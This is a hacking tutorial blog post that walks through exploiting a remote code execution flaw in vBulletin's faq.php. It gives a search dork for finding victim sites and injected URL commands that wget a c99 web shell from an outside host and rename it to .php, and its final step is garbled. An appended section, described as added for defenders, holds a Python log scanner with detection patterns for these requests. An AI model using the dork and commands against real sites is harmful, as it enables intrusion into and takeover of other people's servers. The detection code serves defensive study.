Hey friends, this is the Toxic Boys Team. Yesterday we studied XPath. Now it's time to study Remote Code Execution. First, an introduction: what is it? The answer is simple: "In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process.
It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such a vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shellcode to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution."
~~ vBulletin RCE Injection ~~
A few websites running vBulletin are vulnerable to Remote Code Execution. By exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website.
toxicmask.blogspot.com/2016/11/how-to-hide-shell-using-cmd-and-htaccess.html
We'll use a dork to find the vulnerable website. How to create dorks is explained here:
toxicmask.blogspot.com/2016/10/create-own-dorks-2016-2017-method-to.html
Note: don't keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc.
Use of multiple search engines will help you to get more vulnerable websites. Dork is Here
Dork:inurl:faq.php & intext:"Warning: system() [function.system]"
Now, select any website of your choice from the search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.
You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1
So, first upload your PHP shell on any free hosting website, or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will first be uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.)
Suppose the vulnerable website is
http://www.vulnerable.com/faq.php
So in order to upload our shell enter the following in the URL:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt
To check if we were able to successfully upload our shell, enter the following in the URL
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt
Where c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page.
(Might be a little different in some cases)
-rw-r--r-- 1 nobody nobody
We know that our shell is successfully uploaded on the website,
now it's time to change the file format from .txt to .php in order to execute it on the server.
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)
Now, the file format is changed. It's time to execute the shell,
so to execute it enter the following in the URL:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
After a successful upload and check, you can access anything. Thanks. If you have any questions, just comment.
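From the defender's side, the requests in this walkthrough leave a clear trail in the web server access log: a query parameter carrying chained shell commands, a download tool followed by a URL, and a rename to .php. The following is an added example, not code from the original post; the log lines, IP addresses and host names are constructed, and the pattern lists are illustrative assumptions to tune for your own environment.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); all hosts/IPs are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Nov/2016:10:01:02 +0000] "GET /faq.php HTTP/1.1" 200 5120
198.51.100.7 - - [12/Nov/2016:10:01:40 +0000] "GET /faq.php?cmd=cd%20/tmp;wget%20http://files.example/c99.txt HTTP/1.1" 200 412
198.51.100.7 - - [12/Nov/2016:10:02:05 +0000] "GET /faq.php?cmd=cd%20/tmp;ls%20-la%20c99.txt HTTP/1.1" 200 455
198.51.100.7 - - [12/Nov/2016:10:02:31 +0000] "GET /faq.php?cmd=cd%20/tmp;mv%20c99.txt%20check.php HTTP/1.1" 200 398
203.0.113.9 - - [12/Nov/2016:10:03:00 +0000] "GET /search.php?q=tom%20%26%20jerry;%20the%20movie HTTP/1.1" 200 2210
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
CHAIN = re.compile(r'[;|&`]|\$\(')                        # command separators / substitution
TOOLS = re.compile(r'\b(?:wget|curl|mv|cp|chmod|ls|cd)\b')  # illustrative list, not exhaustive
DOWNLOAD = re.compile(r'\b(?:wget|curl)\b[^;|&]*\bhttps?://')
TO_PHP = re.compile(r'\b(?:mv|cp)\s+\S+\s+\S+\.(?:php\d?|phtml)\b')

def params(target):
    """Yield decoded (name, value) pairs, splitting on '&' only so that a
    ';' inside a value is kept (some query parsers treat ';' as a separator)."""
    _, _, query = target.partition('?')
    for pair in filter(None, query.split('&')):
        name, _, value = pair.partition('=')
        yield unquote_plus(name), unquote_plus(value)

def scan(log_text):
    """Return one finding per suspicious request parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        path = m['target'].partition('?')[0]
        for name, value in params(m['target']):
            reasons = []
            if CHAIN.search(value) and TOOLS.search(value):
                reasons.append('chained shell command')
            if DOWNLOAD.search(value):
                reasons.append('remote download')
            if TO_PHP.search(value):
                reasons.append('rename to .php')
            if reasons:
                findings.append({'ip': m['ip'], 'path': path,
                                 'param': name, 'reasons': reasons})
    return findings

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on any of these patterns also warrants checking /tmp and the web root for recently created .php files owned by the web server account.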